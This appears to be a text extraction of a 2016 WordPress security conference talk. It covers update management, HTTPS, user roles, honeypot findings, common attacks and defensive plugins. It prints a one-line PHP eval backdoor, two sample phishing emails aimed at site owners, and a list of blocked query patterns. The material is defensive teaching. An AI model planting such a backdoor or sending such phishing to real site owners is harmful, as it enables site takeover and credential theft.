The document discusses security issues related to WordPress websites. It notes that at least 40% of Czech WordPress sites contain security issues due to outdated versions or unpatched vulnerabilities. The document provides tips on how to better manage WordPress updates and security, including using plugins to automate updates, implementing HTTPS, restricting user roles and capabilities, and general best practices. It also describes common attacks like XSS flaws, SQL injection, cookie hijacking, and how hackers may try to exploit vulnerabilities or trick site owners.

1. http://lynt.cz
WordPress Security:
Defend yourself against digital invaders
Vláďa Smitka
vladimir.smitka@lynt.cz
@smitka
Lynt services s.r.o.
Update!
Backup!
Be careful!

2. http://lynt.cz
WP leaks like a sieve
10. 7. 2016 2
Have you ever heard that?
Let's tell the truth.

3. http://lynt.cz10. 7. 2016 3
Updated / Obsolete
Web developers should push their customers to pay for
support and provide responsibly.
Customers should be willing to accept it – the website is
one of their empoyee in fact.

4. http://lynt.cz
What is the current status?
• Complex research of 65 000 czech sites 04/2015
10. 7. 2016 4
http://lynt.cz/blog/wordpress-in-the-czech-complex-research
WP versions

5. http://lynt.cz
Status 2 days ago (02/2016)
10. 7. 2016 5
16 639
WP versions – 02/2016
unknown

6. http://lynt.cz
Status 2 days ago
10. 7. 2016 6
3.7.13
247
3.8.13
1779
3.9.10
2229
4.0.10
2570
4.1.10
2946
4.2.7
4305
4.3.3
4695
4.4.2
15225
Still updated versions

7. http://lynt.cz
Status 2 days ago (02/2016)
10. 7. 2016 7
25 % WP sites run on 3.6 or lower – security updates are no longer provided
18 % WP sites on 3.7 or higher haven‘t installed the latest security updates yet
=At least 40 % of Czech WP sites contains security issues
Current version
27 %
Supported versions
with updates
30 %
Suported versions,
without updates
18%
Unsupported
versions
28%
WP versions recency

8. http://lynt.cz
What does it mean?
• I ran the annual WordCamp HACK campaign!
• Almost 1000 reports about critical
vulnerabilities or hacked sites were sent
• More than 300 vulnerable Slider Revolution
plugins discovered!
• A WordCamp invitation was included
• Responses from owners and developers of the
affected sites were less than warm…
10. 7. 2016 8

9. http://lynt.cz
How to manage updates?
• WP Updates Notifier plugin sends an e-mail when
an update is available
• Tools allowing bulk management:
– InfiniteWP
– ManageWP
– WP Remote
• How to turn on the auto-update feature (mu-
plugins):
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
10. 7. 2016 9

10. http://lynt.cz
Infinite WP
• Self-hosted
• Base version for free (fully funcional, no limits)
• Just install InfiniteWP Client plugin + copy&paste credentials
10. 7. 2016 10

11. http://lynt.cz
UPDATE 05/2016
• MainWP – new self-hosted bulk management
system – looks very promising
10. 7. 2016 11

12. http://lynt.cz
Automated testing
• If you are afraid that something important breaks
after an update, it is possible to write automated
tests
• Casper.js
• Selenuium
• GhostPy
• Online services: http://www.testomato.com/,...
10. 7. 2016 12

13. http://lynt.cz
Hackers?
10. 7. 2016 13

14. http://lynt.cz
What the hell do they want?
• How do I know?
=> I analyzed many compromised systems + I
run Honey Pots
• http://pot.lynt.cz – it emulates an older WP
with some vulnerabilites and there is also a
fake SSH access
10. 7. 2016 14

15. http://lynt.cz
Honey Pot
• How long did it take from the launch of a new
machine to the first attacks?
10. 7. 2016 15
12 minutes
• The Internet is dangerous – accept this
fact and be prepared

16. http://lynt.cz
Ok, what do they want?
• Inject malicious code to infect visitors and to
show their ads
• Send a SPAM
• Attack other servers
• Gain sensitive data
• Shut down your site/the whole server
10. 7. 2016 16

17. http://lynt.cz
What does the uploaded evil code do?
10. 7. 2016 17
The first mention about Simple UDP
flood is from 2004:
https://forums.cpanel.net/threads/scr
ipt-in-tmp-made-by-hacker.33184/
The most simple backdoor:
eval($_POST[sam]);
Remote shell – e.g. b374k
Scripts to enable more attacks:
• Password cracking
• SPAM sending
• Script Simple UDP flood

18. http://lynt.cz
What methods do they use?
• Login
• Comments
• Particular bugs in
plugins, themes or WP
core
• Tapping
• Phishing
• Cross site infection
through other sites on a
shared hosting
10. 7. 2016 18
Prepared backdoors:
Hi, does anyone have an
experience with ### site?
They offer plugins just for
few bucks
They sell stolen plugins
without the license, you can
download them for free
somewhere on the Internet

19. http://lynt.cz
Cross infection
• Common problem on multihosting
10. 7. 2016 19
Folderwithallsites
Web1
Web2
Web3

20. http://lynt.cz
How to login into WP?
• /wp-admin + user name & password
• XML-RPC (/xmlrpc.php)
• Cookie
• REST-API (/wp-json) – coming soon
10. 7. 2016 20

21. http://lynt.cz
Harvesting user logins
• /?author=1 => /author/admin/
• Password admin, admin0, admin1,… Brute
force
Rules into .htaccess:
RewriteCond %{QUERY_STRING} author=
RewriteRule ^(.*)$ http://uckf.you? [L,R=301]
10. 7. 2016 21

22. http://lynt.cz
A hacker can tap your credentials
10. 7. 2016 22

23. http://lynt.cz
…or ask you directly
Subject: A security problem on wordcamp.cz
Date: Sat, 20 FEB 2016 09:51:48 +0200
From: HOSTING <your@amazing.hosting>
To: <you>
Dear customer,
Your website wordcamp.cz running on WordPress contains a serious security problem in the „Some
Amazing Plugin“ which enables to gain full control over your website and attack other sites
consequently.
There is no official patch available yet but our team can fix the issue manually. For this purpose we need
your credentials to your WP administration.
Send them ASAP to stop the attacks. Otherwise we will be forced to turn off your site.
Regards,
Your Amazing Hosting, Inc.
10. 7. 2016 23

24. http://lynt.cz
XML RPC
• /xmlrpc.php
• This protocol allows remote control of your site from various
applications – e.g. post publishing
• The protocol is used rarely
• But some plugins use it – JetPack
• system.multicall function which allowed an attacker to test
hundreds of passwords with one call (disclosured and fixed in
September 2015)
• If you want to use XML RPC, allow it only form particular IP
addresses
10. 7. 2016 24
Block via .htaccess
<Files "xmlrpc.php">
Order Allow,Deny
deny from all
</Files>

25. http://lynt.cz
Cookie
10. 7. 2016 25

26. http://lynt.cz
Cookie
wordpress_9338f7bf999516f89fdc070299cf0b82=admin
%7C1456673124%7COB8LpfMl7ZqlMm1zuN23LMBGOna
0IdLmz4g7JQBwtYn%7Cb73f661495e9323a6df2dffe8001
5360b41ed8970a5cf05dd4053aecc4109a40
10. 7. 2016 26
• md5(URL) = http://pot.lynt.cz
• User name
• Validity = 28.2.2016 15:25:24 (+14 days)
• Hash – AUTH_KEY + AUTH_SALT + 4 chars from password‘s hash
• Token (od 4.0) hash 43 random chars

27. http://lynt.cz
Crypto keys in wp-config.php
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
define('AUTH_SALT', 'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT', 'put your unique phrase here');
define('NONCE_SALT', 'put your unique phrase here');
You can obtain new ones from:
https://api.wordpress.org/secret-key/1.1/salt/
The HACK campaing discovered that 16 % of sites with a vulnerability in Slider Revolution also used default
crypt keys.
If you install WP via wp-config-sample.php renaming, don‘t forget to change the crypto keys!
10. 7. 2016 27

28. http://lynt.cz
WordPress 4.0+
10. 7. 2016 28
You can invalidate the „remember me“ token and log off all users
36 % WP websites uses older version
User profile:

29. http://lynt.cz
Cookie tapping
10. 7. 2016 29
Na rozdíl od jména a hesla, se cookie posílají stále.

30. http://lynt.cz
Higher rights – higher risks
10. 7. 2016 30
• Subscriber
– Can read posts, edit their profile. The main benefit is easier commenting.
• Contributor
– Can write new posts but can‘t publish them (Editor or Administrator have to
publish them). Doesn‘t have access to the Media Gallery (can embed images
form external sources) – useful for guest blogging.
• Author
– Can manage their posts, manage comments on these posts. Had access to the
Media Gallery. Can‘t manage pages.
• Editor
– Can manage all content – posts, pages, comments, categories. Can use
javascript in comments.
• Administrator
– All rights – content, plugins, themes, widgets, menus. A good practice is not to
create content with the admin account.
• SuperAdministrator (only in WP multisite) – manages the network

31. http://lynt.cz
Privileges customization
• Rights are editable – e.g. If a person needs to
change the menu, they don‘t need the admin
rights:
• Use plugin User Role Editor
• Or use a similar code:
10. 7. 2016 31
https://codex.wordpress.org/Roles_and_Capabilities
$role_object = get_role( 'editor' );
$role_object->add_cap( 'edit_theme_options' );

32. http://lynt.cz
HTTPS
• SSL cerificates are cheap (finally):
• < 8 $/year – e.g. ssls.cz
• Free – Let‘s Encrypt
(needs support on server)
• 2 options
– Whole web on HTTPS (better)
– Only administration on HTTPS
10. 7. 2016 32
git clone https://github.com/letsencrypt/letsencrypt /opt/letsencrypt
./letsencrypt-auto --apache -d <my-web> -d www. <my-web>
Obnovovací skript: http://do.co/le-renew (le-renew <my-web>)

33. http://lynt.cz
Deploy HTTPS – whole web
• Ask your host/admin to set up the certificate
• Try if it works
• Settings - General
10. 7. 2016 33
You can set up it also in the wp-config.php,
- it saves DB queries:
define('WP_HOME', 'https://<my-web>');
define('WP_SITEURL', 'http://<my-web>');
• There is a problem with the mixed content – WP makes absolute links – you
need to fix it
• SSL Insecure Content Fixer
• Fix in admin – one by one
• Fix in DB:
UPDATE wp_posts SET post_content = REPLACE(post_content,
'http://<my-web>', 'https://<my-web>')

34. http://lynt.cz
Deploy HTTPS – administration only
Place this code into wp-config.php:
define( 'FORCE_SSL_ADMIN', true );
There is a problem with the mixed content in the Media Gallery:
SSL Insecure Content Fixer + the „Simple“ settings
10. 7. 2016 34

35. http://lynt.cz10. 7. 2016 35
Fixes CSS, JS
and Images
in the Media
Gallery
Fixes
incorrect
URLs in the
content
SSL Insecure Content - settings

36. http://lynt.cz
Redirect from HTTP to HTTPS
In .htaccess:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{SERVER_PORT} !^443$
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [R,L]
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
10. 7. 2016 36
* May differ on some hostings

37. http://lynt.cz
Other encrypted protocols
• SFTP/SCP instead FTP
• SSH instead Telnet
• IMAPs (POP3s) instead IMAP (POP3)
• SMTP TLS/SMTP STARTTLS instead SMTP
• VPN
10. 7. 2016 37

38. http://lynt.cz
How does the attack proceed?
• Check publicly known information (domain
owners, e-mail addresses, IPs, employees‘
names… recon-ng)
• Active scan, identification - WP-scan
• Agressive scan – e.g. DirBuster (tries if
particular folders exist - /phpmyadmin/,…)
• Vulnerabilities tests – generate suspicious
queries
• Can be detected - causes many 404
10. 7. 2016 38

39. http://lynt.cz
XSS
10. 7. 2016 39

40. http://lynt.cz
XSS – worse
10. 7. 2016 40

41. http://lynt.cz
XSS – really dangerous
10. 7. 2016 41
Overlay reacts on mouse movement:
onMouseMove
Edit Themes

42. http://lynt.cz
XSS – at its maximum
10. 7. 2016 42

43. http://lynt.cz
Ask admin for help
Subject: A security problem on wordcamp.cz
Date: Sat, 20 FEB 2016 09:59:02 +0200
From: HOSTING <your@amazing.hosting>
To: <you>
Dear customer,
Your website wordcamp.cz running on WordPress contains a serious security problem in the „Some
Amazing Plugin“ which enables to gain full control over your website and attack other sites
consequently.
You need to disable the funcion „Uglyness “ until a patch is available – you can do so simply via
following link:
http://<your-web>/wp-content/plugins/amazing-plugin/abc.php?xy=dG9obGUgamUgemx5IGtvZCA6LSk
Please disable the function or delete the plugin, otherwise we will be forced to turn off your site.
Regards,
Your Amazing Hosting, Inc.
10. 7. 2016 43

44. http://lynt.cz
Cross-site request forgery
• When the system doesn‘t check the origin of the request
10. 7. 2016 44
Hi Admin, check
this cool site!
Cool site
Lorem ipsum
/create new user for the attacker
• The prevention are the „signed“ forms (there is a unique token
added by server and checked after the submision)
• WP uses „nonces“ (no all plugins use them…)
/wp-admin/post.php?post=1&action=trash&_wpnonce=b192fc4204

45. http://lynt.cz
SQL Injection
• Unsanitized inputs (again)
• It is possible to modify DB queries and
consequently obtain the complete data from DB
• Interesting stuff in the DB:
– E-mails
– User names, hashed passwords
– Auth Token for autologin Cookie
– Credentials to external services
10. 7. 2016 45

46. http://lynt.cz
Security plugins
• My favourite combo:
• WordFence + BBQ: Bad Block Queries
• Blocks invalid login attempts
• Limits scans
• File changes detection
• Denies user logins harvesting
• Denies PHP execution in uploads
• Limits SPAM
• Accesses to the global attackers list
• Filters out the suspicious queries
10. 7. 2016 46

47. http://lynt.cz10. 7. 2016 47

48. http://lynt.cz
WordFence – after installation
10. 7. 2016 48
Level 2: more notifications, limiting invalid logins
Level 3: starts with the traffic limiting
Level 4: blocks invalid login names immediately

49. http://lynt.cz
WordFence – Live Traffic
10. 7. 2016 49

50. http://lynt.cz
WordFence – file changes detection
10. 7. 2016 50

51. http://lynt.cz
WordFence – traffic limiting
10. 7. 2016 51

52. http://lynt.cz
WordFence – login security
10. 7. 2016 52

53. http://lynt.cz
WordFence – other options
10. 7. 2016 53

54. http://lynt.cz
WordFence – other options
10. 7. 2016 54
Great plugin but unfortunatelly it lacks blocking of suspicious queries

55. http://lynt.cz10. 7. 2016 55
Simple plugin, no configuration – blocks suspicious queries
E.g.: eval(, base64_, UNION * SELECT, wp-config.php, < …

56. http://lynt.cz
UPDATE 05/2016
• There is a new „Firewall“ feature in
WordFence since 6.1.1
• It blocks suspicious queries

10. 7. 2016 56

57. http://lynt.cz
Recovery after infection
• Stop the web (e.g. deny all in .htaccess)
• Remove everything, restore from clean backup/
manual disinfection if no clean backup available (FAR)
• Imitate the cause (usually update)
• Change FTP password
• Change DB password
• Change users‘ passwords, check unknown users
• New crypto keys into wp-config.php:
https://api.wordpress.org/secret-key/1.1/salt/
• Check files for changes and evil code (Wordfence,
Sucuri Scanner)
10. 7. 2016 57

58. http://lynt.cz
Inspiration – how do we protect our sites?
• wp-login.php only from the Czech Republic (GeoIP module)
• Blocked xmlrpc.php and some other files + disabled PHP in uploads
• Comments spam blocking (NoSpamNX) + Ping/Track Back filter (Topsy
Blocker)
• Bulk updates management
• Sites isolation
• HTTP headers:
– X-Frame-Options SAMEORIGIN;
– X-XSS-Protection "1; mode=block"
– X-Content-Type-Options nosniff
• Deletion unused themes and plugins
10. 7. 2016 58

59. http://lynt.cz
Inspiration – how do we protect our sites?
• Fail2Ban (invalid login attempts, too many 404,
https://wordpress.org/plugins/wp-fail2ban/ )
• Suspicious queries filtering (serverside)
• Realtime log (Log Stash) and error (Sentry) analysis
• Server monitoring (Zabbix)
• File changes detection + malware analysis – Maldet + Yara
• Daily serverside backups (plugins can be used as well: BackWPup,
UpdraftPlus, BackupBuddy)
• Watch current resources about new threats
10. 7. 2016 59

60. http://lynt.cz
Resources
• Information about vulnerabilities
• https://www.owasp.org/
• https://wpvulndb.com/
• https://blog.sucuri.net/
• https://www.wordfence.com/blog/
• https://packetstormsecurity.com/
• https://www.reddit.com/r/xss
• My presentation from last year:
• http://www.slideshare.net/vsmitka/wordpress-security-for-
everone
10. 7. 2016 60

61. http://lynt.cz
Homework for tomorrow
□ Check unique crypto keys in the wp-config.php
□ Create backup
□ Remove unused plugins
□ Remove all unused themes (you can keep one
of the default themes and the parent theme)
□ Lower user rights
□ Update everything
10. 7. 2016 61

62. http://lynt.cz
Thank you for your attention
10. 7. 2016 62
Update, backup, use a security plugin, be careful